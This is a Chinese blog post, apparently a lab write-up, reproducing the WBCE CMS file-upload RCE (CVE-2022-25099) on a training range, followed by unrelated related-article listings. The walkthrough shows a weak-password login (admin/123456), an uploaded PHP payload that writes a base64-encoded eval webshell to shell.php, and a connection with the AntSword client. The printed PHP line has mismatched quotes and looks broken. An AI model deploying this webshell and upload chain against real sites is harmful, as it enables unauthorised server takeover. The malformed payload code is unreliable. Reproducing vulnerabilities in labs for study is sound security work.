WBCE CMS RCE漏洞复现（CVE-2022-25099）

最新推荐文章于 2024-07-12 15:51:39 发布

sszsNo1

最新推荐文章于 2024-07-12 15:51:39 发布

阅读量390

点赞数

文章标签： php

本文链接：https://blog.csdn.net/sszsNo1/article/details/131500301

版权

一、环境搭建

使用春秋云镜搭建的环境

二、访问靶场

1、使用网站登录路径/admin/login/

访问页面，成功访问

2、漏洞利用

猜测弱口令admin/123456

点击上传一句话木马文件，尝试验证，内容以下

<?php phpinfo();?>

页面显示出来，说明验证成功

尝试写入文件，内容以下

<?php

system('file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTtlY2hvIDEyMztwaHBpbmZvKCk7Pz4='));

?>

出现空白，大概率说明写入成功

使用中国蚁剑进行连接，密码为cmd

http://eci-2zeeg1tk5m7gosng2ule.cloudeci1.ichunqiu.com/admin/languages/shell.php

连接成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sszsNo1

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
WBCE CMS RCE漏洞复现（CVE-2022-25099）

WBCE CMS RCE漏洞（CVE-2022-25099）如何复现
复制链接

扫一扫

WBCE CMS安全漏洞(CVE-2022-25099)

千寻的博客

12-09

2312

WBCE CMS v1.5.2的` /language/install.php `文件存在漏洞，攻击者可精心构造文件上传造成`RCE`

CVE-2022-22963 复现Demo

04-14

CVE-2022-22963 复现Demo，A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...

参与评论您还未登录，请先登录后发表或查看评论

CVE-2022-25099

龙狼刺的博客

06-25

450

WBCE CMS v1.5.2 /language/install.php 文件存在漏洞，攻击者可精心构造文件上传造成RCE。

春秋云境：CVE-2022-25099

一只爱吃橙子的羊

12-01

1285

WBCE CMS v1.5.2 /language/install.php 文件存在漏洞，攻击者可精心构造文件上传造成RCE

春秋云境：CVE-2022-25099（文件上传造成RCE）

m0_65712192的博客

04-22

987

WBCE CMS v1.5.2 /language/install.php 文件存在漏洞，攻击者可精心构造文件上传造成RCE

WBCE CMS任意文件上传漏洞（CVE-2022-25099）

weixin_68999845的博客

07-21

1100

WBCE CMS 存在安全漏洞，该漏洞源于 /languages/index.php 中的漏洞允许攻击者通过精心设计的 PHP 文件执行任意代码。源码下载url：https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.5.2.zip。上传路径为 /admin/languages/install.php，在post body部分可以看到明显的恶意payload。1.按照源码下载：https://github.com/WBCE/WBCE_CMS。

WBCE CMS v1.5.2 RCE(CVE-2022-25099)漏洞复现

qq_70303095的博客

10-20

2104

WBCE CMS v1.5.2 /language/install.php 文件存在漏洞，攻击者可精心构造文件上传造成RCE。

向日葵RCE漏洞（CNVD-2022-10270）检测工具

02-19

向日葵RCE漏洞（CNVD-2022-10270）检测工具，已经编译好，命令行运行即可 xrkrce.exe -h 127.0.0.1

CVE-2022-22965 GUItools单个图形化利用工具

04-06

CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题，此前通过黑名单的方式修复了该漏洞，但是 JDK9之后引入了 Module，使得可以通过 getModule 绕过前者的黑名单限制，最后导致远程代码执行。

CVE-2021-21972：CVE-2021-21972漏洞利用

03-04

CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866，VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...

PHP编程开发工具有哪些？

Pythonit教程网

07-10

1009

PHP的开发工具种类繁多，涵盖了从集成开发环境（IDE）、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具：### 1. 集成开发环境（IDE）* **PhpStorm**：由JetBrains开发的全功能PHP IDE，提供了代码自动完成、调试器、版本控制工具等丰富的功能，支持多种框架和技术。PhpStorm拥有最现代化的功能集，可以快速便捷地进行网页开发，并支持所有PHP语言功能，是专业PHP开发的优选工具。 * **Eclipse PDT**：基于Eclips

什么是RPC？有哪些RPC框架？

yuiezt的专栏

07-09

1822

RPC（Remote Procedure Call，远程过程调用）是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节，使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统，其中不同的组件可以分布在不同的计算机上，但它们之间可以像在同一台机器上一样相互调用。

【Docker-compose】搭建php 环境

AllenIverrui的博客

07-10

980

ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎；它是一个实时的分布式搜索分析引擎，它能让你以前所未有的速度和规模，去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合：Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索，还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中，为它的编辑们提供公众对于新文章的实时反馈。

PHP7.4安装使用rabbitMQ教程（windows）

qq_28546559的博客

07-09

236

1，可能报错ext-sockets * -> it is missing，在php.ini中开启sockets扩展既可。下载地址：https://pecl.php.net/package/amqp。3，修改php.ini文件，增加extension=php_amqp.dll。1，将php_amqp.dll放到对应的php的ext目录下。三，安装库——php-amqplib/php-amqplib。一，检查php版本phpinfo()——下载所需扩展。

java版的上门家政系统和PHP版的上门家政有什么区别？

最新发布

baina666的博客

07-12

491

综上所述，Java版和PHP版的上门家政系统各有优缺点，选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时，由于Java生态系统的复杂性和多样性，也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版：Java拥有庞大的生态系统和丰富的第三方库，这为家政系统的开发和扩展提供了强大的支持。Java版：由于Java的编译执行机制和高效的垃圾回收算法，Java版家政系统通常具有更高的运行效率和更好的性能表现，尤其是在处理高并发、大数据量等复杂场景时。

网关、DHCP协议、ip地址、子网掩码简单介绍

mantouyouyou的博客

07-11

1241

参考文章：https://baike.baidu.com/item/%E7%BD%91%E5%85%B3/98992?fr=ge_ala。

【pbootcms】新环境搭建环境安装时发生错误

艾塔SEO

07-11

165

至此测试成功，可以正常访问后台。新环境安装后台，第一时间替换授权代码，再进行其他操作。2、数据库信息是否替换（根目录下/config/database.php 文件）3、重新删除runtime目录（runtime文件夹为缓存文件夹）1、试着删除根目录下runtime目录,刷新页面重试。3、检查服务器环境pathinfo及伪静态规则配置;【pbootcms】新环境搭建环境安装时发生错误。2、检查系统会话文件存储目录是否具有写入权限;

CVE-2020-14882&14883：Weblogic RCE复现1

08-03

声明：请勿用作违法用途，否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交